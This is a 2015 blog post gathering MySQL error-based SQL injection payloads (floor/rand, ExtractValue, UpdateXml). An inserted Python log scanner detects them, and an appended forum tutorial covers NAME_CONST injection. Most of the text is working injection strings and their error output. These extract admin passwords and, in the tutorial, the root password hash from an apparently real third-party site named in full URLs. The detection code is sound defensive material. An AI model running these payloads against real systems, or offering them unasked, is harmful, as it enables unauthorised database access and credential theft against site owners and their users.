
MySQL: exploiting the three error-based injection modes (floor, ExtractValue, UpdateXml)

Posted on 2015-11-11 19:03:37

1. Triggering errors via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

Example. First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace the version() expression with the query you want.
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
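From the defender's side, the three payload shapes above have stable request-side signatures. The following is an added example (not code from the original post) that flags them in web access-log lines; the log format handled by REQUEST_RE and the sample lines are constructed assumptions, and the signature list also includes the NAME_CONST form collected later in the post.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the error-based techniques in this post.
# They are matched against the URL-decoded query string with all whitespace
# removed, so percent-encoded letters and extra spacing still match.
SIGNATURES = {
    "floor":        re.compile(r"floor\(rand\(\d*\)\*2\)", re.I),
    "extractvalue": re.compile(r"extractvalue\(", re.I),
    "updatexml":    re.compile(r"updatexml\(", re.I),
    "name_const":   re.compile(r"name_const\(", re.I),
}

# Assumed access-log request field: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify_request(url_path):
    """Return the technique names whose signature appears in the request path."""
    _, _, query = url_path.partition("?")
    decoded = re.sub(r"\s+", "", unquote_plus(query))
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines):
    """Return (client_ip, techniques) for every access-log line carrying a payload."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            techniques = classify_request(m.group(1))
            if techniques:
                hits.append((line.split()[0], techniques))
    return hits


# Constructed sample log lines (not from the original post); the payloads
# mirror the three statements shown above, URL-encoded as a browser sends them.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/Nov/2015:19:04:02 +0800] "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 219',
    '10.0.0.9 - - [11/Nov/2015:19:04:10 +0800] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 201',
    '10.0.0.9 - - [11/Nov/2015:19:04:15 +0800] "GET /article.php?id=1+and+1=(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1" 500 201',
]

if __name__ == "__main__":
    for ip, techniques in scan_log(SAMPLE_LOG):
        print(ip, ",".join(techniques))
```

A matching request followed by an HTTP 500 is the combination worth alerting on, since these techniques only work when the database error reaches the client.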



Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+


http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables
Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+ B, p9 N! \/ V1 D+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.